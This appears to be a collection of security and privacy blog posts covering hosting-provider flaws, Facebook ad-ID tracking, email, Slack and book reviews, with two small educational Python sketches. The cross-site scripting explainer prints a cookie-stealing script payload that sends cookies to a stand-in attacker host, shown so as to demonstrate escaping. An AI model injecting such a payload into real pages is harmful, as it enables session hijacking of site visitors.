A solid toolset is at the core of any successful digital forensics program, as I wrote in an earlier article for CSOonline. Although every toolset is different depending on an organization’s needs, some categories should be in all forensics toolkits. In this roundup for CSOonline, I describe some of the more popular tools, many of which are free to download. I have partitioned them into six categories: overall analysis suites (such as the SANS workstation shown here), disk imagers, live CDs, network analysis tools, e-discovery, and specialized tools for email and mobile analysis.
If you host your website on GoDaddy, DreamHost, Bluehost, HostGator, OVH or iPage, this blog post is for you. Chances are your site could be vulnerable to a potential bug or has been purposely infected with something that you probably didn’t know about. Given that millions of websites are involved, this is a moderately big deal.
It used to be that finding a hosting provider was a matter of price and reliability. Now you have to check to see if the vendor actually knows what they are doing. In the past couple of days, I have seen stories such as this one about GoDaddy’s web hosting:
And then there is this post, which talks about the other hosting vendors:
If you use GoDaddy hosting, you should go to your cPanel hosting portal, click on the small three dots at the top of the page (as shown above), click “help us” and ensure you have opted out.
Okay, moving on to the second article, about other hosting provider scripting vulnerabilities. Paulos Yibelo looked at several providers and found multiple issues that differed among them. The issues involved cross-site scripting, cross-site request forgery, man-in-the-middle problems, potential account takeovers and bypass attack vulnerabilities. The list is depressingly long, and Yibelo’s descriptions show each provider’s problems. “All of them are easily hacked,” he wrote. But what was more instructive was the responses he got from each hosting vendor. He also mentions that Bluehost terminated his account, presumably because they saw he was up to no good. “Good job, but a little too late,” he wrote.
Most of the providers were very responsive when reporters contacted them and said these issues have now been fixed. OVH hasn’t yet responded.
So the moral of the story? Don’t assume your provider knows everything, or even anything, about hosting your site, and be on the lookout for similar research. Find a smaller provider that can give you better customer service (I have been using EMWD.com for years and can’t recommend them enough). If you don’t know what some of these scripting attacks are or how they work, go on over to OWASP.org and educate yourself about their basics.
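If you aren't sure what a cross-site scripting flaw actually looks like, here is a minimal, hypothetical sketch (the page template and payload are invented for illustration, not taken from any of the providers above) showing how unescaped user input becomes an injected script, and how simple HTML escaping defuses it:

```python
import html

def render_comment(comment: str, escape: bool = True) -> str:
    """Build a toy comment page; escaping is what a careful host should do."""
    body = html.escape(comment) if escape else comment
    return f"<div class='comment'>{body}</div>"

# A classic cookie-stealing payload a visitor might submit as a "comment"
malicious = "<script>document.location='https://evil.example/?c='+document.cookie</script>"

unsafe = render_comment(malicious, escape=False)  # script tag lands in the page verbatim
safe = render_comment(malicious)                  # rendered inert as &lt;script&gt;...

print("<script>" in unsafe)  # True: a browser would execute the payload
print("<script>" in safe)    # False: the payload is displayed as text, not run
```

The whole class of reflected XSS bugs comes down to that one missing `escape` step somewhere in a page template.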
If you run a WordPress blog, you need to get serious about keeping it as secure as possible. WordPress is a very attractive target for hackers for several reasons that I’ll get to in a moment. To help you, I have put together my recommendations for the best ways to secure your site, and many of them won’t cost you much beyond your time to configure them properly. My concern for WordPress security isn’t general paranoia; my own website has been attacked on numerous occasions, including a series of DDoS attacks on Christmas Day. I describe how to deploy various tools such as WordFence, shown below, and you can read more on CSOonline.
I hope you all had a nice break for the holidays and you are back at work refreshed and ready to go. Certainly, last year hasn’t been the best for Facebook and its disregard for its users’ privacy. But a post that I have lately seen come across my social news feed is blaming them for something that isn’t possible. In other words, it is a hoax. The message goes something like this:
Snopes describes this phony alert here. They say it has been going on for years. And it has gained new life, particularly as the issues surrounding Facebook privacy abuses have increased. So if you see this message from one of your Facebook friends, tell them it is a hoax and nip this in the bud now. You’re welcome.
The phony privacy message could have been motivated by the fact that many of you are contemplating leaving or at least going dark on your social media accounts. Last month saw the departure of several well-known thought leaders from the social network, such as Walt Mossberg. I am sure more will follow. When I wrote about this topic last year, I suggested that, at the very minimum, if you are concerned about your privacy you should delete the Facebook Messenger app from your phone and just use the web version.
But even if you leave the premises, it may not be enough to completely cleanse yourself of anything Facebook. This is because of a new research report from Privacy International that is sadly very true. The issue has to do with third-party apps that are constructed from Facebook’s Business Tools. And right now, it seems only Android apps are at issue.
The problem has to do with the APIs that are part of these tools, and how they are used by developers. One of the interfaces specifies a unique user ID value that is assigned to a particular phone or tablet. That ID comes from Google, and is used to track what kind of ads are served up to your phone. This ID is very useful, because it means that different Android apps that are using these Facebook tools all reference the same number. What does this mean for you? Unfortunately, it isn’t good news.
The PI report looked at several different apps, including Dropbox, Shazam, TripAdvisor, Yelp and several others.
If you run multiple apps that have been developed with these Facebook tools, with the right amount of scrutiny your habits can be tracked, and it is possible that you could be de-anonymized and identified by the apps you have installed on your phone. That is bad enough, but the PI researchers also found four additional disturbing things that make matters worse:
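To see why one shared identifier matters so much, here is a toy sketch (all app names, events and the ID value are invented) of how event logs from unrelated apps can be joined on the same advertising ID to assemble a single profile:

```python
from collections import defaultdict

# Hypothetical per-app logs: each app only knows its own events,
# but all of them key their records on the same Google advertising ID.
prayer_app_log = [{"ad_id": "38400000-8cf0-11bd", "event": "prayer_times_viewed"}]
job_app_log    = [{"ad_id": "38400000-8cf0-11bd", "event": "searched_jobs"}]
kids_app_log   = [{"ad_id": "38400000-8cf0-11bd", "event": "children_game_played"}]

def merge_profiles(*logs):
    """Join events across otherwise-unrelated apps on the shared ID."""
    profiles = defaultdict(list)
    for log in logs:
        for record in log:
            profiles[record["ad_id"]].append(record["event"])
    return dict(profiles)

profiles = merge_profiles(prayer_app_log, job_app_log, kids_app_log)
print(profiles["38400000-8cf0-11bd"])
# One ID now links religious practice, a job hunt, and a child in the home.
```

No single app reveals much on its own; the damage comes from the join.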
First, the tracking ID is created whether you have a Facebook account or not. So even if you have gone full Mossberg and deleted everything, you will still be tracked by Facebook’s computers. It also is created whether or not your phone is logged into your Facebook account (or using other Facebook-owned products, such as WhatsApp).
Second, the tracking ID is created regardless of what you have specified in your privacy settings for each of the third-party apps. The researchers found that the default setting by the Facebook developers for these apps was to automatically transfer data to Facebook whenever a phone’s user opens the app. I say was because Facebook added a “delay” feature to comply with the EU’s GDPR. An app developer has to rebuild their apps with the latest version to employ this feature, however. The PI researchers found 61% of the apps they tested automatically send data when they are opened.
Third, some of these third-party apps send a great deal of data to Facebook by design. For example, the Kayak flight search and pricing tool collects a great deal of information about your upcoming travels – this is because it is helping you search for the cheapest or most convenient flights. This data could be used to construct the details about your movements, should a stalker or a criminal wish to target you.
When you put together the tracking ID with some of this collected data, you can find out a lot about who you are and what you are doing. The PI researchers, for example, found one user who was running the following apps:
- “Qibla Connect” (a Muslim prayer app),
- “Period Tracker Clue,”
- “Indeed” (a job search app), and
- “My Talking Tom” (a children’s app).
This means the user could be potentially profiled as likely a Muslim mother who is looking for a new job. Thinking about this sends a chill up my spine, as it probably does with you. The PI report says, “Our findings also show how routinely and widely users’ Google ad ID is being shared with third parties like Facebook, making it a useful unique identifier that enables third parties to match and link data about an individual’s behavior.”
Finally, the researchers also found that the opt-out methods don’t do anything; the apps continue to share data with Facebook no matter what you have done in your privacy settings, or if you have explicitly sent any opt-out messages to the app’s creators.
Unfortunately, there are a lot of apps that exhibit this behavior: researchers found that Facebook apps are the second most popular tracker, after Google’s parent company Alphabet, for all free apps on the Google Play Store.
So what should you do if you own an Android device? PI has several suggestions:
- Reset your advertising ID regularly, by going to Settings > Google > Ads > Reset Advertising ID.
- Go to Settings > Google > Ads > Opt out of personalized advertising to limit ads that leverage your personal data.
- Make sure you update your apps to keep them current.
- Regularly review the app permissions on your phone and make sure you haven’t granted anything you aren’t comfortable with.
Clearly, the real bad news about Facebook is stranger than fiction.
Zimperium is very useful in managing mobile device risks and automating their remediation across the largest enterprise networks.
It includes phishing detection and has the ability to run on both a variety of different cloud infrastructures as well as on-premises. It has deep on-device detection and a fine-grained collection of access roles. It uses a web-based console that controls protection policies and configuration parameters. Reports can be customized as well for management and compliance purposes. I tested the software in December 2018 on a sample network with both Android and iOS devices of varying vintages and profiles.
Pricing decreases with volume, starting at $60/year/device.
Keywords: David Strom, web informant, video screencast, mobile device security, mobile device manager, MDM, mobile threat management, Knox security, iOS security
I have known Jon Callas for many years, tracking back to when he was part of the PGP Corporation and bringing encrypted email to the world. He has been a long-time security researcher who has been part of the launch teams at Silent Circle and Blackphone. Recently he has moved from Apple to the ACLU, where he is a technical fellow in the Speech, Privacy and Technology Project.
I spoke to him last week and caught up with what he is working on now, and thought you might be interested. His job now is to help the mostly legal team at the ACLU understand the technical issues, especially as someone who has been deeply steeped in them over the years. “Technology is such a part of the modern world that we need more people to understand it,” he said. One of his focus areas is the recent changes in Australian encryption laws. He is still trying to figure out the implications, and so far he views this bill as more guiding government assistance than actual intervention. The bill also raises more questions than it answers, such as how does a developer secretly insert code into a system that has tracking or build version controls? (Here is the backstory, and ProtonMail’s comments on the law are here.) He is also watching the revelations around the Facebook document trove that was released this week by British lawmakers. “Clearly, there are contradictions between what Facebook management said they were and weren’t doing and what was mentioned in these documents,” he said. When I asked him what he would do if he were CTO of Facebook, he just laughed.
One other area of interest is understanding how the government is acting to curb freedom of speech, and what is going on at our borders. “The government quite reasonably says that they can look inside your suitcase when you cross into our country. That I understand, but shouldn’t your electronic devices be treated differently from what else is in your suitcase? There are many answers here, and we need to have legal and policy discussions and understand exactly what problems we are trying to solve.”
We also spoke about the recent actions by Google employees protesting their Chinese-specific search engine. “I find it encouraging that tech people are looking at the consequences of what they do and where this technology is going to be used and what it all means,” he said. Now, “we are more in tune with privacy concerns. People are thinking about the ethics and consequences of what they are doing. They want to have a part in these discussions. That is what a free society should do.”
It has been 20 years since Marshall Rose and I wrote our book about Internet email. Since then, it has become almost a redundant term: how could you have email without using the Internet? For that matter, how can you have a business without any email to the outside world? It seems unthinkable today.
But for something so essential to modern life, Internet email also comes with multiple ironic situations. I will get to these in a moment.
To do some research for this essay, I re-read a column that I wrote ten years ago about the evolution of email between 1998 and 2008. Today I want to talk about the last ten years and what we all have been doing during this period. I would call this decade the post-email era, because email has become the enabling technology for an entire class of applications that previously weren’t possible or weren’t as easy ten years ago. Things like Slack, MFA logins, universal SMS, and the thousands of apps that notify us of their issues using email. Ironically, all of this has almost eclipsed the actual use of Internet email itself. While ten years ago we had many of these technologies, now they are in more general use. And by post-email I don’t mean that we have stopped using it; quite the contrary. Now it is so embedded in our operations that most of us don’t even think much about it and take it for granted, like the air we breathe. That’s its second irony.
When a new business is being formed, usually the decision for its email provider comes down to hosting email on Google or Microsoft’s servers. That is a big change from ten years ago, when cloud-based email was still being debated and (in some cases) feared. I have been hosting my email on Google’s servers for more than ten years, and many of you have also done the same.
Another change is pricing. This has made email a commodity and it is pretty reasonable: Google charges $5 per month for 30 GB of storage or $10 per month with either 1 TB or unlimited storage. If you want to go with Microsoft, they have similarly priced plans for 1 TB of storage. That is an immense amount of storage. Remember when the first cloud emailers had 1 GB of storage? That seems so quaint — and so limiting — now. For all the talk back then about “inbox zero” (meaning culling messages from your inbox as much as possible), we have enabled email hoarding. That’s another irony.
Apart from all this room to keep our stuff, another major reason for using the cloud is that it frees up the decision as to which email client to run (and to support) for each user. A third reason is that the cloud frees up users to run multiple email clients, depending on what device and for what particular post-email task they want to accomplish. Both of these concepts were pretty radical 20 years ago, and even five years ago they were still not as well accepted as they are now. Today many of us spend more of our time on email with our phones than our desktops, and use multiple programs for our email, and don’t give this a second thought.
Why would anyone want to host their own email server anymore? Here is another irony: one reason is privacy. The biggest thing to happen to email in the past ten years was a growing awareness of how exposed one’s email communications could be. Between Snowden’s revelations and Hillary’s server, it is now crystal clear to the world at large that your email can be read by your government.
When Marshall developed the early email protocols, he didn’t hide this aspect of its operations. It just took the rest of the world many years to catch on. As a result, we now have companies that are deliberately locating in data havens to prevent governments from gaining access to their data streams. Witness ProtonMail and Kolabnow, both doing business from Switzerland, and Mailfence, operating out of Belgium. These companies have picked their locations because they don’t want your email finding its way into the NSA’s Utah data centers, or anywhere else for that matter. And we have articles such as this one in Ars that discuss the issues around Swiss privacy laws. Today a business knows enough to ask where its potential messages will be stored, whether they will be encrypted, and who has control over its encryption keys. That certainly wasn’t in many conversations — or even decisions about selecting an email provider — ten years ago.
One way to take back control over your email is literally to host your own email server so that your message traffic is completely under your control. That has been a difficult proposition even for tech-savvy businesses — until now. This is what Helm is trying to do, and they have put together a sexy little server (about the size of a small gingerbread house, to keep things festive and seasonal) which can sit on any Internet network anywhere in the world and deliver messages to your inbox. It doesn’t take a lot of technical skill to set up (you use a smartphone app), and it will encrypt all your messages end-to-end. Helm doesn’t touch them and can’t decrypt them either. Because of this, the one caveat is that you can’t use a webmail client. That is a big tradeoff for many of us who have grown to like webmail over the past decade. Brian Krebs blogged this week that users can pick two items out of security, privacy and convenience. That is the rub. With Helm, you get privacy and security, but not convenience (if you are a webmail user). Irony again: webmail has become so pervasive, but you need to go back to running your own server and email desktop clients if you want ironclad security.
Speaking of email encryption, one thing that hasn’t changed in the past ten years is how rarely it is used. One of the curiosities of the Snowden revelations was how hard he had to work to find a reporter who was adept enough at using PGP to exchange encrypted messages. Encryption still is hard. And while ProtonMail and Tutanota and others (mentioned in this article) have come into play, they are still more curiosities than in widespread general use.
Another trend over the past ten years is how spam and phishing have become bigger problems. This is happening as our endpoints get better at filtering malware out of our inboxes. This is one reason to use hosted Exchange or Gmail: both companies are very good at stopping spam and malicious messages.
It is somewhat of an ironic contradiction: you would hope that better spam processing would make us safer, not more at risk. This risk is easy to explain but hard to prevent. All it takes is just one user on your network, who clicks on one wrong attachment, and a hacker can gain control over your desktop and eventually your entire network. Now that scenario is a common one witnessed in many TV and movie episodes, even in non-sci-fi-themed shows. For example, this summer we had Rihanna as a hacker in Ocean’s 8. Not very realistic, but certainly fun to watch.
So welcome to the many ironies of the post email era. Share your thoughts about how your own email usage has evolved over this past decade if you feel so inclined.
When it comes to protecting your Slack messages, many companies are still flying blind. Slack has become the de facto corporate messaging app, with millions of users and a variety of third-party add-on bots and other apps that can extend its use. It has made inroads into replacing email, which makes sense because it is so immediate, like other messaging apps. But it is precisely its flexibility and ubiquity that make protecting its communications more compelling.
In this post for CSOonline, I take a closer look at what is involved in securing your Slack installation and some of the questions you’ll want to ask before picking the right vendor’s product. You can see some of the tools that I took a closer look at in the chart above.
Last week the Electronic Frontier Foundation published an interesting book called The End of Trust. It was published in conjunction with the writing quarterly McSweeneys, to which I have long subscribed and whose more usual fiction short-story collections I enjoy. This issue is its first entirely non-fiction effort, and it is worthy of your time.
There are more than a dozen interviews and essays from major players in the security, privacy, surveillance and digital rights communities. The book tackles several basic issues: first, the fact that privacy is a team sport, as Cory Doctorow opines — meaning we have to work together to ensure it. Second, there are numerous essays about the role of the state in a society that has accepted surveillance, and the equity issues surrounding these efforts. Third, the outcomes and implications of outsourcing digital trust. Finally, various authors explore the difference between privacy and anonymity and what this means for our future.
While you might be drawn to articles from notable security pundits, such as an interview where Edward Snowden explains the basics behind blockchain and where Bruce Schneier discusses the gap between what is right and what is moral, I found myself reading other, less famous authors who had a lot to say on these topics.
Let’s start off by saying there should be no “I” in privacy, and we have to look beyond ourselves to truly understand its evolution in the digital age. The best article in the book is an interview with Julia Angwin, who wrote an interesting book several years ago called Dragnet Nation. She says, “the word formerly known as privacy is not about individual harm, it is about collective harm. Google and Facebook are usually thought of as monopolies in terms of their advertising revenue, but I tend to think about them in terms of acquiring training data for their algorithms. That’s the thing that makes them impossible to compete with.” In the same article, Trevor Paglen says, “we usually think about Facebook and Google as essentially advertising platforms. That’s not the long-term trajectory of them, and I think about them as extracting-money-out-of-your-life platforms.”
Role of the state
Many authors spoke about the role that law enforcement and other state actors have in our new always-surveilled society. Author Sara Wachter-Boettcher said, “I don’t just feel seen anymore. I feel surveilled.” Thenmozhi Soundararajan writes that “mass surveillance is an equity issue and it cuts across the landscape of race, class and gender.” This is supported by Alvaro Bedoya, the director of a Georgetown Law school think tank. He took issue with the statement that everyone is being watched, because some are watched an awful lot more than others. With new technologies, it is becoming harder to hide in a crowd, and thus we have to be more careful about crafting new laws that allow the state access to this data, because we could lose our anonymity in those crowds. “For certain communities (such as LBGTQ), privacy is what lets its members survive. Privacy is what lets them do what is right when what’s right is illegal. Digital tracking of people’s associations requires the same sort of careful First Amendment analysis that collecting NAACP membership lists in Alabama in the 1960s did. Privacy can be a shield for the vulnerable and is what lets those first ‘dangerous’ conversations happen.”
Scattered throughout the book are descriptions of various law enforcement tools, such as drones, facial recognition systems, license plate readers and cell-phone simulators. While I knew about most of these technologies, seeing them collected together in this fashion makes them seem all the more insidious.
Outsourcing our digital trust
Angwin disagrees with the title and assumed premise of the book, saying the point is more about the outsourcing of trust than its complete end. That outsourcing has led to where we prefer to trust data over human interactions. As one example, consider the website Predictim, which scans a potential babysitter or dog walker to determine if they are trustworthy and reliable using various facial recognition and AI algorithms. Back in the pre-digital era, we asked for personal references and interviewed our neighbors and colleagues for this information. Now we have the Internet to vet an applicant.
When eBay was just getting started, they had to build their own trust proxy so that buyers would feel comfortable with their purchases. They came up with early reputation algorithms, which today have evolved into the Uber/Lyft star-rating for their drivers and passengers. Some of the writers in this book mention how Blockchain-based systems could become the latest incarnation for outsourcing trust.
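As a rough illustration of what those early reputation algorithms do (my own toy math, not eBay’s or Uber’s actual formula), a basic reputation score is just an average of ratings, usually smoothed with a prior so that a seller with two perfect reviews doesn’t outrank one with hundreds:

```python
def reputation(ratings, prior_mean=3.0, prior_weight=5):
    """Smoothed (Bayesian-style) average: with few ratings, the score
    stays near the prior; with many, the real average dominates."""
    if not ratings:
        return prior_mean
    return (prior_mean * prior_weight + sum(ratings)) / (prior_weight + len(ratings))

newcomer = reputation([5, 5])      # two perfect reviews: pulled toward the prior
veteran = reputation([5] * 200)    # two hundred perfect reviews: nearly 5.0
print(round(newcomer, 2), round(veteran, 2))
```

The interesting design choice is the prior: it is the platform, not the crowd, deciding how much evidence trust requires — which is exactly the outsourcing the book describes.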
Privacy vs. anonymity
The artist Trevor Paglen says, “we are more interested not so much in privacy as a concept but more about anonymity, especially the political aspects.” In her essay, McGill ethics professor Gabriella Coleman says, “Anonymity tends to nullify accountability, and thus responsibility. Transparency and anonymity rarely follow a binary moral formula, with the former being good and the latter being bad.”
Some authors explore the concept of privacy nihilism, or disconnecting completely from one’s social networks. This was explored by Ethan Zuckerman, who wrote in his essay: “When we think about a data breach, companies tend to think about their data like a precious asset like oil, so breaches are more like oil spills or toxic waste. Even when companies work to protect our data and use it ethically, trusting a platform gives that institution control over your speech. The companies we trust most can quickly become near-monopolies whom we are then forced to trust because they have eliminated their most effective competitors. Facebook may not deserve our trust, but to respond with privacy nihilism is to exit the playing field and cede the game to those who exploit mistrust.” I agree, and while I am not happy about what Facebook has done, I am also sticking with them for the time being too.
This notion of the relative morality of our digital tools is also taken up in a recent NY Times op/ed by NYU philosopher Matthew Liao entitled, Do you have a moral duty to leave Facebook? He says that the social media company has come close to crossing a “red line” but for now he is staying with them.
The book has a section for practical IT-related suggestions to improve your trust and privacy footprint, many of which will be familiar to my readers (MFA, encryption, and so forth). But another article by Douglas Rushkoff goes deeper. He talks about the rise of fake news in our social media feeds and says that it doesn’t matter what side of an issue people are on for them to be infected by the fake news item. This is because the item is designed to provoke a response and replicate. A good example of this is one individual recently mentioned in this WaPost piece who has created his own fake news business out of a parody website here.
Rushkoff recommends three strategies for fighting back: attacking bad memes with good ones, insulating people from dangerous memes via digital filters and the equivalent of AV software, and better education about the underlying issues. None of these are simple.
This morning the news was about how LinkedIn harvested 18 million email addresses to target ads to recruit people to join its social network. What is chilling about this is that all of these email addresses were from non-members, collected, of course, without their permission.
You can go to the EFF link above where you can download a PDF copy or go to McSweeneys and buy the hardcover book. Definitely worth reading.
A new book from Professor Josephine Wolff at the Rochester Institute of Technology, called You’ll See This Message When It Is Too Late, is worth reading. While there are plenty of other infosec books on the market, to my knowledge this is the first systematic analysis of different data breaches over the past decade.
She reviews a total of nine major data breaches of the recent past and classifies them into three different categories, based on the hackers’ motivations: those that happened for financial gain (TJ Maxx, the South Carolina Department of Revenue and various ransomware attacks); for cyberespionage (DigiNotar and the US OPM); and for online humiliation (Sony and Ashley Madison). She takes us behind the scenes of how the breaches were discovered, what mistakes were made and what could have been done to mitigate the situation.
A lot has already been written on these breaches, but what sets Wolff’s book apart is that she isn’t trying to assign blame but to dig into their root causes and link together the various IT and corporate policy failures that led to each breach.
There is also a lot of discussion about how management is often wrong about these root causes or the path towards mitigation after the breach is discovered. For example, then-South Carolina governor Nikki Haley insisted that if only the IRS had told them to encrypt their stolen tax data, they would have been safe. Wolff then describes what the FBI had to do to fight the Zeus botnet, where its authors registered thousands of domain names in advance of each campaign, generating new ones for each attack. The FBI ended up working with security researchers to figure out the botnet’s algorithms and be able to shut down the domains before they could be used by the attackers. This was back in 2012, when such partnerships between government and private enterprise were rare. This collaboration also happened in 2014 when Sony was hacked.
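The technique Wolff describes is known as a domain generation algorithm (DGA). This toy sketch (invented seed, hash choice and TLD — not Zeus’s real algorithm) shows the core idea: the list of rendezvous domains is deterministic, so anyone who reverse-engineers the code can compute tomorrow’s domains in advance, which is exactly what let the FBI and researchers pre-register or block them:

```python
import hashlib
from datetime import date

def generate_domains(seed: str, day: date, count: int = 5):
    """Derive a deterministic list of rendezvous domains for a given day."""
    domains = []
    for i in range(count):
        # Hash the seed, the date, and a counter to get a pseudorandom label
        digest = hashlib.md5(f"{seed}-{day.isoformat()}-{i}".encode()).hexdigest()
        domains.append(digest[:12] + ".com")
    return domains

# The botnet and a defender running the same code get the same list.
today = generate_domains("toy-seed", date(2012, 3, 1))
print(today)
```

Because bots only need one of the day’s domains to resolve, attackers generate thousands; defenders have to sinkhole or block them all, which is why the takedown required that government–industry partnership.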
Another example of management security hubris can be found with the Ashley Madison breach, where its managers touted how secure its data was and how your profiles could be deleted with confidence — both promises were far from the truth as we all later found out.
The significance of some of these attacks wasn’t appreciated until much later. For example, the attack on the Dutch registrar DigiNotar’s certificate management eventually led to its bankruptcy. But more importantly, it demonstrated that a small security flaw could have global implications, undermining overall trust in the Internet and compromising hundreds of thousands of Iranian email accounts. To this day, most Internet users still don’t understand the significance of how these certificates are created and vetted.
Wolff mentions that “finding a way into a computer system to steal data is comparatively easy. Finding a way to monetize that data can be much harder.” Yes, mistakes were made by the breached parties she covers in this book. “But there were also potential defenders who could have stepped in to detect or stop certain stages of these breaches.” This makes the blame game more complex, and shows that we must consider the entire ecosystem and understand where the weak points lie.
Yes, TJ Maxx could have provided stronger encryption for its wireless networks; South Carolina DoR could have used MFA; DigiNotar could have segmented its network more effectively and set up better intrusion prevention policies; Sony could have been tracking exported data from its network; OPM could have encrypted its personnel files; Ashley Madison could have done a better job with protecting its database security and login credentials. But nonetheless, it is still difficult to define who was really responsible for these various breaches.
For corporate security and IT managers, this book should be required reading.